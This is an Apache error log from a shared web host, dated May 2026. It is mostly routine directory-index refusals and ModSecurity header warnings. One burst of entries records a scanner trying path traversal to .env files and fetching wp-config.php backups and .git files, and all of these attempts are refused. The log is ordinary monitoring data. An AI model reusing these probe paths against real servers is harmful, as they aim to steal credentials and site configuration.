[Tue May 12 03:26:03.325671 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/freeform/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:26:04.305009 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/freeform/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/freeform/
[Tue May 12 03:26:07.098248 2026] [security2:error] [pid 1709071:tid 1709106] [client 43.157.82.252:39036] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/concert/punk/"] [unique_id "agKBr7vMumyrWMfSu7qz8gAAANM"]
[Tue May 12 03:26:12.214049 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/images/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:26:13.143343 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/images/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/images/
[Tue May 12 03:26:15.360547 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:26:16.261503 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/ocean/
[Tue May 12 03:26:17.555105 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:26:18.450476 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/widgets/
[Tue May 12 03:26:21.927140 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/languages/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:26:22.576204 2026] [security2:error] [pid 1709071:tid 1709091] [client 43.130.14.245:45092] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rentparadise.fr"] [uri "/"] [unique_id "agKBvrvMumyrWMfSu7q0EwAAAMQ"]
[Tue May 12 03:26:22.803230 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/languages/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/languages/
[Tue May 12 03:26:26.023383 2026] [security2:error] [pid 1709071:tid 1709095] [client 43.130.14.245:38956] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rentparadise.fr"] [uri "/"] [unique_id "agKBwrvMumyrWMfSu7q0FwAAAMg"], referer: http://www.rentparadise.fr
[Tue May 12 03:26:30.034007 2026] [security2:error] [pid 1695975:tid 1695992] [client 43.130.14.245:44832] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agKBxtVI9ymHBxup74-VSQAAAI4"], referer: https://www.rentparadise.fr/
[Tue May 12 03:26:36.437432 2026] [core:error] [pid 1730175:tid 1730179] [client 45.148.10.238:5490] AH10244: invalid URI path (/../.env)
[Tue May 12 03:26:36.438689 2026] [core:error] [pid 1730175:tid 1730178] [client 45.148.10.238:5528] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 03:26:36.444348 2026] [authz_core:error] [pid 1707624:tid 1707688] [client 45.148.10.238:5384] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2082/wp-config.php.bak
[Tue May 12 03:26:36.446829 2026] [proxy_http:error] [pid 1730207:tid 1730229] (20014)Internal error (specific information not available): [client 45.148.10.238:5376] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.446852 2026] [proxy:error] [pid 1730207:tid 1730229] [client 45.148.10.238:5376] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.git/refs/heads/master
[Tue May 12 03:26:36.445983 2026] [proxy_http:error] [pid 1730175:tid 1730178] (20014)Internal error (specific information not available): [client 45.148.10.238:5528] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.447066 2026] [proxy:error] [pid 1730175:tid 1730178] [client 45.148.10.238:5528] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/400.shtml
[Tue May 12 03:26:36.449153 2026] [proxy_http:error] [pid 1707624:tid 1707682] (20014)Internal error (specific information not available): [client 45.148.10.238:5530] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.449177 2026] [proxy:error] [pid 1707624:tid 1707682] [client 45.148.10.238:5530] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.gitattributes
[Tue May 12 03:26:36.455336 2026] [proxy_http:error] [pid 1691274:tid 1691291] (20014)Internal error (specific information not available): [client 45.148.10.238:5502] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.455365 2026] [proxy:error] [pid 1691274:tid 1691291] [client 45.148.10.238:5502] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.env.old
[Tue May 12 03:26:36.458354 2026] [proxy_http:error] [pid 1730207:tid 1730229] (20014)Internal error (specific information not available): [client 45.148.10.238:5376] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.458374 2026] [proxy:error] [pid 1730207:tid 1730229] [client 45.148.10.238:5376] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/502.shtml
[Tue May 12 03:26:36.465152 2026] [proxy_http:error] [pid 1709071:tid 1709110] (20014)Internal error (specific information not available): [client 45.148.10.238:5444] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.465177 2026] [proxy:error] [pid 1709071:tid 1709110] [client 45.148.10.238:5444] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/_next/image
[Tue May 12 03:26:36.465244 2026] [authz_core:error] [pid 1707624:tid 1707689] [client 45.148.10.238:5414] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2082/wp-config.php~
[Tue May 12 03:26:36.468821 2026] [proxy_http:error] [pid 1707624:tid 1707682] (20014)Internal error (specific information not available): [client 45.148.10.238:5530] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.468842 2026] [proxy:error] [pid 1707624:tid 1707682] [client 45.148.10.238:5530] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/502.shtml
[Tue May 12 03:26:36.472541 2026] [proxy_http:error] [pid 1695975:tid 1695988] (20014)Internal error (specific information not available): [client 45.148.10.238:5396] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.486423 2026] [proxy_http:error] [pid 1730207:tid 1730229] (20014)Internal error (specific information not available): [client 45.148.10.238:5376] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.488535 2026] [proxy_http:error] [pid 1707624:tid 1707682] (20014)Internal error (specific information not available): [client 45.148.10.238:5530] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.497450 2026] [proxy_http:error] [pid 1707624:tid 1707689] (20014)Internal error (specific information not available): [client 45.148.10.238:5414] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.501887 2026] [proxy_http:error] [pid 1691274:tid 1691490] (20014)Internal error (specific information not available): [client 45.148.10.238:5500] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.514368 2026] [proxy_http:error] [pid 1730207:tid 1730213] (20014)Internal error (specific information not available): [client 45.148.10.238:5430] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.516326 2026] [proxy_http:error] [pid 1707624:tid 1707688] (20014)Internal error (specific information not available): [client 45.148.10.238:5384] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.522741 2026] [proxy_http:error] [pid 1709071:tid 1709110] (20014)Internal error (specific information not available): [client 45.148.10.238:5444] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.529755 2026] [authz_core:error] [pid 1730175:tid 1730184] [client 45.148.10.238:5394] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2082/wp-config.php.txt
[Tue May 12 03:26:36.544469 2026] [core:error] [pid 1695975:tid 1695983] [client 45.148.10.238:5364] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 03:26:36.596814 2026] [proxy_http:error] [pid 1691274:tid 1691297] (20014)Internal error (specific information not available): [client 45.148.10.238:5446] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:36.675474 2026] [proxy_http:error] [pid 1691274:tid 1691291] (20014)Internal error (specific information not available): [client 45.148.10.238:5502] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 03:26:37.336768 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:26:38.231112 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/rest-api/endpoints/
[Tue May 12 03:26:39.695196 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:26:40.588065 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/rest-api/
[Tue May 12 03:27:02.239175 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:03.129834 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/images/media/
[Tue May 12 03:27:04.412228 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/customize-widgets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:05.331545 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/customize-widgets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/css/dist/customize-widgets/
[Tue May 12 03:27:06.728556 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/separator/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:07.619092 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/separator/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/separator/
[Tue May 12 03:27:08.899352 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/imgareaselect/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:09.793476 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/imgareaselect/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/js/imgareaselect/
[Tue May 12 03:27:11.094533 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:11.994052 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/buttons/
[Tue May 12 03:27:15.603053 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:16.486412 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/Text/Diff/Renderer/
[Tue May 12 03:27:17.796934 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:18.677900 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/.well-known/acme-challenge/
[Tue May 12 03:27:22.219002 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/image/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:23.201168 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/image/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/image/
[Tue May 12 03:27:26.672472 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/video/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:27.540554 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/video/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/blocks/video/
[Tue May 12 03:27:31.007521 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:31.987286 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/ectoplasm/
[Tue May 12 03:27:35.585371 2026] [proxy_fcgi:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:27:35.745414 2026] [proxy_fcgi:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:27:35.906438 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:27:36.816756 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/sitemaps/
